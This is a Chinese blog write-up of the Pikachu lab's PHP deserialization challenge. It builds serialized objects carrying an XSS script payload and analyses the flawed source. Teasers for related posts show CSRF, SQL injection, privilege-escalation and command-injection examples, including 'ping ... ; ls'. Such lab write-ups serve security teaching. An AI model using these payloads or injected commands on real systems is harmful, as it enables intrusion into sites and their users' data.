加载中...

PHP反序列化

发表于2025-02-16|更新于2025-02-16|网安靶场Pikachu

|总字数:662|阅读时长:2分钟|浏览量:

原理

序列化 serialize()

把一个对象变成可以传输的字符串

反序列化 unserialize()

把被序列化的字符串还原成对象

魔法函数

常见的几个魔法函数:
__construct()当一个对象创建时被调用
__destruct()当一个对象销毁时被调用
__toString()当一个对象被当作一个字符串使用
__sleep() 在对象在被序列化之前运行
__wakeup将在序列化之后立即被调用

题目

一开局就然我们输入一个序列化数据，不知道想干啥，我们就随便写一个对象

class S{
	public $text = 'pikachu';
}
$s = new S();
$s = serialize($s);
echo $s;

1	O:1:"S":1:{s:4:"text";s:7:"pikachu";}

输入进去，发现下面文本有一个输出了一个 pikachu，真神奇，不知道怎么实现的？

class S{
	public $text = 'pikachu';
	public $test = 'hello';
}
$s = new S();
$s = serialize($s);
echo $s;

1	O:1:"S":2:{s:4:"text";s:7:"pikachu";s:4:"test";s:5:"hello";}

我们再输入进去，发现输出的 hello，莫非是输出最后一个变量？

不管了，既然在网页中直接输出字符串，我们开始构造。

class S{
	public $text = "<script>alert('hello')</script>";
}
$s = new S();
$s = serialize($s);
echo $s;

1	O:1:"S":1:{s:4:"text";s:31:"<script>alert('hello')</script>";}

发现还是输出的 pikachu，科师刚才为啥会输出 hello 呢，我们放到第二个试试？

class S{
	public $text = 'pikachu';
	public $test = "<script>alert('hello')</script>";
}
$s = new S();
$s = serialize($s);
echo $s;

1	O:1:"S":2:{s:4:"text";s:7:"pikachu";s:4:"test";s:31:"<script>alert('hello')</script>";}

OK,完美收工，应该是获取第二个的变量，从而输出在网页上。

源码分析

很明显，这里代码根本就没给类 S 实例化，所以也就没用到魔法函数，只是下面的判断语句起了用途，并且不是我想的需要第二个，还是变量名称腰围 test 就可以了，笑。

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}


//O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";
    }

}
?>

文章作者: Mr.Virus

文章链接: http://example.com/posts/17013.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Mr.Virus's Blog！

相关推荐

CSRF(Cross-Site Request Forgery)跨站请求伪造 CSRF(GET)看一下提示，可以得到很多的用户与密码，这里以 vince 账户为实验。 12345姓名:vince性别:boy手机:18626545453住址:chain邮箱:vince@pikachu.com 将邮箱修改成 mov@pikachu.com 了。不过没看到它在 URL 有显示 GET 获取的数据罢了。我们看一下浏览器中表单中各个组件的 name 值我们简单构造一下 1?sex=boy&phonenum=18626545453&add=chain&email=mrvirus@qq.com&submit=submit 发现没有用。那我老老实实用 Burpsuite 去抓包看看有什么缺的。 **tips：**其实少写一个 submit 那个发送按键，因为 value 为 submit，所以后面再加一个 submit=submit。 1234567891011GET...

文件包含漏洞本地文件包含漏洞远程文件包含漏洞 include、include_once、require、require_once include 和 requrie 的区别 include 包含有错误还会继续运行，而 require 会中止。 xxx 和 xxx_once 的区别 once 只会运行一次下面的 local 和 remote 的区别就是，看一下代码 local 的 1include "include/$filename"; remote 的 1include "$filename"; 可以看到 local 的代码明显自由度不高，被 include/限制了，但是我们可以用.. .这样的符号在本地内 include。 remote 不仅可以在本地，还可以用 URL 引用互联网上的 php 以及其他的文件。 File Inclusion(local)File Inclusion(remote)

Croos-Site Scripting

XSS（跨站脚本）一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户。类型：反射型 XSS 存储型 XSS DOM 型 XSS 反射型 XSS（GET）有输入框我们就可以试试一些 js 代码 1<script>alert("hello");</script> 输入进去，我们可以看到，前端限制了长度这个简单，这种就是用了 HTML 的语法限制。我们浏览器调试一下。把 maxlength 改成 100 甚至更大。解决这个题目有一个 GET，就是通过 URL 进行传输信息。说明我们不仅可以通过修改 HTML 语法进行绕过，还可以通过修改 URL 进行绕过。方法修改 HTML 修改 URL 反射型 XSS（POST）先看一下提示，我们获得了一个账号。我们进去之后，可以输入那串 js 代码即可。存储型 XSS看到一个文本框，老规矩，先输入我们的 js 代码。 ok 可以。并且每次刷新也不会消失。 DOM 型 XSS可以看到，这次简单输入 js...

SQL 注入前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。 MySQL 通用查库、查表、查列我们直接使用 MySQL 命令行进行操作。使用库我们平时在进行 SQL 注入时，后端代码已经自己使用库了。但是，我们在使用 MySQL 命令行工具时，是需要通过命令来使用库的。 1use pikachu 我们就可以查看当前库了 1234567mysql> select database();+------------+| database() |+------------+| pikachu |+------------+1 row in set (0.00 sec) 查库1select schema_name from information_schema.schemata; 我们呢发现命令行输出了这两个数据库。原理是使用 select 读取了 information_schema 数据库中的 schemata 表中的 schema_name...

水平越权我们输入 kobe 的账号密码，进入进去，查看个人资料，我们发现 URL 上面的信息，我们可以尝试改成其他用户名(lucy/lili/kobe) 1http://192.168.17.129:8000/vul/overpermission/op1/op1_mem.php?username=kobe&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF 发现改成 lucy 的，在 kobe 页面也可以看到 lucy 的个人信息，这就是水平越权漏洞了。同样的可以看到 lili 的信息。垂直越权提供了 admin/123456、pikachu/000000，还说明了 admin 是超级用户，我们登录 admin 账号试试。同样的我们发现了添加用户和删除用户的 URL，我们就登录看 pikachu 这个账户看能不能利用即可。添加用户的...

RCE(remote command/code execute)远程命令/代码执行。 exec “ping”Docker 安装 ping 命令工具由于我们 docker 中并不能执行 ping 命令，所以我们需要安装 ping 命令的工具。我们先进入 docker pikachu 的容器（注意需要 sudo） 1docker exec -it [容器ID] [/bin/bash] 进去之后，就用 apt 工具进行安装 1apt install iputils-ping 原理和 SQL/XSS 注入一样，都可以堆输入框进行命令构造。SQL 构造的是 SQL 语句，XSS 一般构造 HTML 或者 JS，而 RCE 在这里构造 SHELL 命令。在 Linux 中，ping 命令是一直执行的，所以上面应该是 1ping -c 4 [addr] 我们的输入就是 addr，这也是我们构造的地方。如果我们想查看当前目录的文件，就构造成了 1ping -c 4 www.baidu.com ; ls 这里的分号是 Linux Shell...